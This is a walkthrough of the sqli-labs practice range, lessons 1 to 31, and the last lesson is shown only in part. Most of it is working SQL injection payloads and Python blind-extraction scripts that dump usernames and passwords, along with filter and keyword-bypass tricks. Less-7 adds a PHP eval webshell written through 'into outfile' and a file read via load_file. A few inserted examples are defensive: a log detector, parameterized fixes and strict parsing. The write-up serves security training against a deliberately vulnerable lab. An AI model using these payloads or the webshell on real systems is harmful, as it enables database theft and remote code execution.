sqli-labs Practice Range

I. Preface

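  • I worked through these labs once when I first started learning, but I only half understood them at the time, so I am going back through them again.

  • Use Docker on a Linux virtual machine for a one-command setup, then browse to port 80 on the VM's IP address.

    docker search sqli-labs    # search for the image
    docker pull acgpiano/sqli-labs    # pull the image
    docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs    # run the image
    
  • I recommend typing everything out by hand to get familiar with the relevant functions and statements. This article may not analyze each lesson in detail and mostly lists only the payloads, but if anything is unclear or you have questions, just leave a comment and I will reply as soon as possible.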

II. Main Text

less-1

  • No filtering; closed with a single quote.

    ?id=0' union select 1,2,database()--+   view database
    ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=0' union select 1,2,group_concat(username,0x3e,password) from users --+   view contents
    

less-2

  • The variable is an integer; otherwise same as above.

    ?id=0 union select 1,2,database()--+   view database
    ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+   view contents
    

less-3

  • Same as less-1, except the closing style has an extra parenthesis.

    ?id=0') union select 1,2,database()--+   view database
    ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=0') union select 1,2,group_concat(username,0x3e,password) from users --+   view contents
    

less-4

  • Same as less-3, except the single quote becomes a double quote.

    ?id=0") union select 1,2,database()--+   view database
    ?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=0") union select 1,2,group_concat(username,0x3e,password) from users --+   view contents
    

less-5

  • Boolean-based blind injection would actually work here, but since errors are echoed back, error-based injection is used instead.

    ?id=0' and extractvalue(1,concat(1,(select database())))--+   view database
    ?id=0' and extractvalue(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+   view tables
    ?id=0' and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')))--+   view columns
    ?id=0' and extractvalue(1,substring(concat(1,(select group_concat(username,0x3e,password) from users)),1,32))--+   view contents
    
  • Likewise:

    ?id=0' and updatexml(1,concat(1,(select database())),1)--+
    ?id=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+   view tables
    ?id=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
    ?id=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+   view contents
    

less-6

  • Same as less-5, except the single quote becomes a double quote; try the floor() function error.

    ?id=0" union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a--+   view database
    ?id=0" union select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+   view tables
    ?id=0" union select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+   view columns
    ?id=0" union select 1 from (select count(*),concat((select password from users limit 11,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+   view contents
    
  • There is also the exp() error.

    ?id=0" and exp(~(select * from(select database())a));--+   view database
    ?id=0" and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a));--+   view tables
    ?id=0" and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')a));--+   view columns
    ?id=0" and exp(~(select * from(select group_concat(username,0x3e,password) from users)a));--+   view contents
    
  • The following also all work:

    ?id=0" and geometrycollection((select * from(select * from(select database())a)b))--+
    ?id=0" and multipoint((select * from(select * from(select database())a)b))--+
    ?id=0" and polygon((select * from(select * from(select database())a)b))--+
    ?id=0" and multipolygon((select * from(select * from(select database())a)b))--+
    ?id=0" and linestring((select * from(select * from(select database())a)b))--+
    ?id=0" and multilinestring((select * from(select * from(select database())a)b))--+
    

less-7

  • A one-line webshell can be written here, then connected to with AntSword.

    ?id=1')) union select 1,"<?php @eval($_GET['cmd']); ?>",3 into outfile "/var/www/html/1.php" --+
    
  • Correspondingly, if output is echoed back, files can be read.

    ?id=0' union select 1,2,load_file('/flag')--+
    

less-8

  • Boolean-based blind injection.

import requests

url = "http://192.168.0.4:84/Less-8/?id=0'||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,1,0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,1,0)--+'%(i,mid)
        r = requests.get(url + payload)
        if "..........." in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-9

  • Time-based blind injection.

import requests

url = "http://192.168.0.4:84/Less-9/?id=0'||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-10

  • Same time-based blind injection as above, with the single quote replaced by a double quote.

import requests

url = 'http://192.168.0.4:84/Less-10/?id=0"||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
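
The request pattern that the binary-search scripts in less-8 to less-10 leave in a web server access log, seen from the detection side. This is an added example, not part of the original write-up; the log lines are constructed, and the thresholds (min_probes, min_thresholds) and the helper names are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')
# ascii(substr(<expr>,<position>,1))><threshold>: the comparison the scripts repeat
PROBE_RE = re.compile(
    r"ascii\(\s*substr\(.+,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*>\s*(\d+)", re.IGNORECASE)
SLEEP_RE = re.compile(r"\bsleep\s*\(", re.IGNORECASE)


def log_line(ip, target):
    """Build one constructed access-log line in common log format."""
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 706'


PROBE_PATH = "/Less-{n}/?id=0'%7C%7Cif(ascii(substr(database(),{pos},1))%3E{mid},{hit},0)--+"

# Constructed sample log (not captured traffic).
SAMPLE_LOG = "\n".join([
    log_line("10.0.0.5", PROBE_PATH.format(n=8, pos=1, mid=79, hit="1")),
    log_line("10.0.0.5", PROBE_PATH.format(n=8, pos=1, mid=103, hit="1")),
    log_line("10.0.0.5", PROBE_PATH.format(n=8, pos=1, mid=115, hit="1")),
    log_line("10.0.0.5", PROBE_PATH.format(n=8, pos=2, mid=79, hit="1")),
    log_line("10.0.0.9", "/Less-8/?id=1"),                        # normal request
    log_line("10.0.0.7", PROBE_PATH.format(n=9, pos=1, mid=79, hit="sleep(2)")),
    log_line("10.0.0.7", PROBE_PATH.format(n=9, pos=1, mid=103, hit="sleep(2)")),
    log_line("10.0.0.7", PROBE_PATH.format(n=9, pos=1, mid=115, hit="sleep(2)")),
    log_line("10.0.0.8", "/search?q=ascii(substr(x,1,1))%3E5"),   # one-off, below threshold
])


def find_blind_sqli_clients(log_text, min_probes=3, min_thresholds=2):
    """Return clients whose requests look like character-by-character extraction.

    A client is flagged when it sent at least `min_probes` distinct
    (position, threshold) comparisons and compared at least one position
    against `min_thresholds` or more different thresholds, which is the
    signature of a binary search over one character.
    """
    probes = defaultdict(lambda: defaultdict(set))   # ip -> position -> thresholds
    timed = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        decoded = unquote_plus(target)
        probe = PROBE_RE.search(decoded)
        if not probe:
            continue
        probes[ip][int(probe.group(1))].add(int(probe.group(2)))
        if SLEEP_RE.search(decoded):
            timed.add(ip)

    findings = {}
    for ip, by_pos in probes.items():
        total = sum(len(thresholds) for thresholds in by_pos.values())
        searched = [p for p, t in by_pos.items() if len(t) >= min_thresholds]
        if total >= min_probes and searched:
            findings[ip] = {
                "probes": total,
                "positions": sorted(by_pos),
                "technique": "time-based" if ip in timed else "boolean-based",
            }
    return findings


if __name__ == "__main__":
    for client, info in find_blind_sqli_clients(SAMPLE_LOG).items():
        print(client, info)
```

For POST-based variants such as less-15 the payload is in the request body, so the same matching has to run on body or WAF logs rather than the access log.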

less-11

  • The simplest POST union injection; the HackBar browser extension can be used.

    uname=0' union select 1,database()--+&passwd=1   view database
    uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1   view tables
    uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=1   view columns
    uname=0' union select 1,group_concat(username,0x3e,password) from users--+&passwd=1   view contents
    

less-12

  • Same as less-11, with a different closing style.

    uname=0") union select 1,database()--+&passwd=1   view database
    uname=0") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1   view tables
    uname=0") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=1   view columns
    uname=0") union select 1,group_concat(username,0x3e,password) from users--+&passwd=1   view contents
    

less-13

  • Errors are echoed back, so error-based injection is chosen.

    uname=0') and updatexml(1,concat(1,database()),2)--+&passwd=1   view database
    uname=0') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+&passwd=1   view tables
    uname=0') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+&passwd=1   view columns
    uname=0') and updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),32,64)),2)--+&passwd=1   view contents
    

less-14

  • Errors are echoed back, so error-based injection is chosen.

    uname=0" and updatexml(1,concat(1,database()),2)--+&passwd=1   view database
    uname=0" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+&passwd=1   view tables
    uname=0" and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+&passwd=1   view columns
    uname=0" and updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),32,64)),2)--+&passwd=1   view contents
    

less-15

  • POST-based time-based blind injection.

import requests

url = "http://192.168.3.39:84/Less-15/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        data_database= {
            'uname': """admin' and if(ascii(substr(database(),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_table= {
            'uname': """admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_column= {
            'uname': """admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_value= {
            'uname': """admin' and if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }      
        try:
            r = requests.post(url, data=data_value, timeout=2)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-16

  • Same as less-15, with the single quote replaced by a double quote and parenthesis; boolean-based blind injection can be tried.

import requests

url = "http://192.168.3.39:84/Less-16/"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        data_database= {
            'uname': """0")||if(ascii(substr(database(),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_table= {
            'uname': """0")||if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_column= {
            'uname': """0")||if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_value= {
            'uname': """0")||if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        r = requests.post(url=url,data=data_value)
        if "flag.jpg" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-17

  • uname is escaped, so the injection point is passwd. The contents cannot be read directly in the last step, so the query is wrapped in one more level of subquery.

    uname=admin&passwd=1' and updatexml(1,concat(1,database()),2)--+   view database
    uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   view tables
    uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+   view columns
    uname=admin&passwd=1' and updatexml(1,concat(0x3e,(select password from (select password from users limit 3,1) aaa ),0x3e),1) --+   view contents
    

less-18

  • Error-based injection; the injection point is the User-Agent request header. Capture the request with Burp and modify it, and also POST uname=admin&passwd=admin.

    User-Agent:0'||updatexml(1,concat(1,database()),1)--+'   view database
    User-Agent:0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+'   view tables
    User-Agent:0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+'   view columns
    User-Agent:0'||updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),1,32)),1)--+'   view contents
    

less-19

  • Error-based injection; the injection point is the Referer request header, same as less-18.

    Referer:0'||updatexml(1,concat(1,database()),1)--+'   view database
    Referer:0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+'   view tables
    Referer:0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+'   view columns
    Referer:0'||updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),1,32)),1)--+'   view contents
    

less-20

  • Direct union injection; the injection point is the Cookie request header.

    Cookie: uname=0' union select 1,2,database()--+   view database
    Cookie: uname=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   view tables
    Cookie: uname=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+   view columns
    Cookie: uname=0' union select 1,2,group_concat(username,0x3e,password) from users--+   view contents
    

less-21

  • Union injection; the injection point is the Cookie request header, with an added layer of base64 encoding. The closing style is a single quote plus parenthesis.

    Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=   view database
    Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSM=   view tables
    Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyM=   view columns
    Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4M2UscGFzc3dvcmQpIGZyb20gdXNlcnMj   view contents
    

less-22

  • Union injection; the injection point is the Cookie request header, with an added layer of base64 encoding. The closing style is a single quote plus parenthesis.

    Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==   view database
    Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw==   view tables
    Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIw==   view columns
    Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUsMHgzZSxwYXNzd29yZCkgZnJvbSB1c2VycyM=   view contents
    

less-23

  • Union injection; comment characters are filtered, and output is echoed back.

    ?id=0' union select 1,2,database()'   view database
    ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security   view tables
    ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users   view columns
    ?id=0' union select 1,2,group_concat(username,0x3e,password) from users where '1   view contents
    

less-24

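  • Second-order injection: the injection arises from the difference between how data is handled when it is stored and when it is read back.
  • First register the user admin'#, then change the password, log out, and log in as the admin user with the changed password.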
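
The store-then-reuse flaw behind less-24, shown next to its fix. This is an added example and not the lab's own code: it uses an in-memory SQLite table as a stand-in for the lab's users table, so the comment marker is -- where the MySQL lab uses #, and all function names and passwords are constructed for illustration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the lab's users table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", "admin-secret"))
    return db


def register(db, username, password):
    # Registration binds its values, so the odd username is stored verbatim.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(db, session_user, new_password):
    # Second-order flaw: the username read back from storage is trusted and
    # concatenated, so its quote and comment marker rewrite the WHERE clause.
    sql = f"UPDATE users SET password='{new_password}' WHERE username='{session_user}'"
    db.execute(sql)
    return sql


def change_password_safe(db, session_user, new_password):
    # Hardened form: stored data is bound as a parameter like any other input.
    db.execute("UPDATE users SET password=? WHERE username=?",
               (new_password, session_user))


def password_of(db, username):
    row = db.execute("SELECT password FROM users WHERE username=?",
                     (username,)).fetchone()
    return row[0] if row else None


def run_case(change_password):
    """Register the crafted name, change 'its' password, report both accounts."""
    db = make_db()
    stored_name = "admin'--"          # SQLite equivalent of the page's admin'#
    register(db, stored_name, "own-pw")
    change_password(db, stored_name, "changed")
    return password_of(db, "admin"), password_of(db, stored_name)


if __name__ == "__main__":
    print("vulnerable:", run_case(change_password_vulnerable))
    print("safe:      ", run_case(change_password_safe))
```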

less-25

  • The keywords or/and are filtered. A direct union injection still works; alternatively substitute || and &&, or bypass by double-writing them (oorr, anandd).

    ?id=0' union select 1,2,database()'   view database
    ?id=0' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security   view tables
    ?id=0' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users   view columns
    ?id=0' union select 1,2,group_concat(username,0x3e,passwoorrd) from users where '1   view contents
    
  • Or use time-based blind injection; the earlier script works with small changes.

import requests

url = 'http://192.168.3.39:84/Less-25/?id=0\' oorr '
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,passwoorrd) from users),%d,1))>%d,sleep(3),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
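
Why the keyword blacklist in less-25 does not hold, and what to use instead. This is an added example, not the lab's source: the filter is assumed to be a single case-insensitive pass that deletes or and and (the behaviour the double-writing above relies on), and the function names are hypothetical.

```python
import re

# Assumed shape of the lesson's filter: delete the keywords in one pass.
BLACKLIST = re.compile(r"or|and", re.IGNORECASE)


def strip_once(value):
    """Single-pass removal, as the assumed filter does."""
    return BLACKLIST.sub("", value)


def survives_filter(value):
    """True when a blacklisted keyword is present again AFTER the filter ran.

    Deleting a keyword joins the text on either side of it, so a keyword
    wrapped around another copy of itself is reassembled by the filter.
    """
    return bool(BLACKLIST.search(strip_once(value)))


def strip_until_stable(value):
    """Repeating the pass until nothing changes closes that gap, but it also
    corrupts ordinary data that merely contains the letters."""
    while True:
        stripped = strip_once(value)
        if stripped == value:
            return value
        value = stripped


def parse_id(raw):
    """Allow-list for an integer parameter: digits only, otherwise reject.

    Combined with a bound query parameter this removes the need to guess
    which keywords are dangerous.
    """
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("id must be a plain integer")
    return int(raw)


if __name__ == "__main__":
    for sample in ("oorr", "anandd", "infoorrmation_schema", "Dorothy"):
        print(f"{sample!r}: once={strip_once(sample)!r} "
              f"stable={strip_until_stable(sample)!r} "
              f"keyword_survives={survives_filter(sample)}")
```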

less-25a

  • Same as above.

    ?id=0 union select 1,2,database()--+   view database
    ?id=0 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+   view tables
    ?id=0 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+   view columns
    ?id=0 union select 1,2,group_concat(username,0x3e,passwoorrd) from users --+   view contents
    
  • Or use time-based blind injection; the earlier script works with small changes.

import requests

url = 'http://192.168.3.39:84/Less-25a/?id=0 oorr '
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,passwoorrd) from users),%d,1))>%d,sleep(3),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-26

  • Spaces, comment characters and or are filtered; bypass with parenthesized syntax, quote closing, and double-writing.

    ?id=0'||updatexml(1,concat(1,database()),1)||'0   view database
    ?id=0'||updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),1)||'0   view tables
    ?id=0'||updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users'))),1)||'0   view columns
    ?id=0'||updatexml(1,concat(1,(substr((select(group_concat(username,0x3e,passwoorrd))from(users)),1,32))),1)||'0   view contents
    

less-26a

  • Same as above; boolean-based blind injection can be used.

import requests

url = "http://192.168.3.39:84/Less-26a/?id=0')||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name="users")),%d,1))>%d,1,0)||(\'0'%(i,mid)
        payload = 'if(ascii(substr((select(group_concat(username,0x3e,passwoorrd))from(users)),%d,1))>%d,1,0)||(\'0'%(i,mid)
        r = requests.get(url + payload)
        if "Dumb" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-27

  • union, select and similar keywords are filtered; bypass with mixed case.

    ?id=0'%0aUNion%0aSElect%0a1,database(),3||'0   view database
    ?id=0'%0aUNion%0aSElect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||'0   view tables
    ?id=0'%0aUNion%0aSElect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||'0   view columns
    ?id=0'%0aUNion%0aSElect%0a1,(SElect%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||'0   view columns
    

less-27a

  • Same as above, with the single quote replaced by a double quote.

    ?id=0"%0aUNion%0aSElect%0a1,database(),3||"0   view database
    ?id=0"%0aUNion%0aSElect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||"0   view tables
    ?id=0"%0aUNion%0aSElect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||"0   view columns
    ?id=0"%0aUNion%0aSElect%0a1,(SElect%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||"0   view columns
    

less-28

  • The phrase union select is filtered as a whole.

    ?id=0')%0auniounion%0aselectn%0aselect%0a1,database(),3||('0   view database
    ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||('0   view tables
    ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||('0   view columns
    ?id=0')%0auniounion %0aselectn%0aselect%0a1,(select%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||('0   view columns
    

less-28a

  • Same as less-28.

    ?id=0')%0auniounion%0aselectn%0aselect%0a1,database(),3||('0   view database
    ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||('0   view tables
    ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||('0   view columns
    ?id=0')%0auniounion%0aselectn%0aselect%0a1,(select%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||('0   view columns
    

less-29

  • Different web servers follow different parsing rules.

    ?id=1&id=-1' union select 1,2,database() --+   view database
    ?id=1&id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=1&id=-1' union select 1,2,group_concat(username,0x3e,password) from users --+   view columns
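
How a repeated id parameter splits a validating front end from the back end in less-29, and a strict parser that removes the ambiguity. This is an added example, not the lab's code: it assumes the front-end check reads the first occurrence of id while the PHP back end uses the last one, and the function names are hypothetical.

```python
from urllib.parse import parse_qsl


def values_of(query, name):
    """All values supplied for one parameter, in request order."""
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]


def frontend_allows(query):
    """Assumed front-end rule: the FIRST id must be digits only."""
    values = values_of(query, "id")
    return bool(values) and values[0].isdigit()


def backend_value(query):
    """Assumed back-end rule (PHP behaviour): the LAST id wins."""
    values = values_of(query, "id")
    return values[-1] if values else None


def strict_single(query, name):
    """Hardened parsing: a parameter supplied zero or several times is rejected,
    so every layer is guaranteed to have looked at the same value."""
    values = values_of(query, name)
    if len(values) != 1:
        raise ValueError(f"{name} must appear exactly once, got {len(values)}")
    return values[0]


if __name__ == "__main__":
    query = "id=1&id=-1'"   # shape of the page's requests, query part shortened
    print("front end allows:", frontend_allows(query))
    print("back end uses:   ", repr(backend_value(query)))
    try:
        strict_single(query, "id")
    except ValueError as exc:
        print("strict parser:   ", exc)
```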
    

less-30

  • Same as less-29.

    ?id=1&id=-1" union select 1,2,database() --+   view database
    ?id=1&id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=1&id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=1&id=-1" union select 1,2,group_concat(username,0x3e,password) from users --+   view columns
    

less-31

  • Same as less-29.

    ?id=1&id=-1") union select 1,2,database() --+   view database
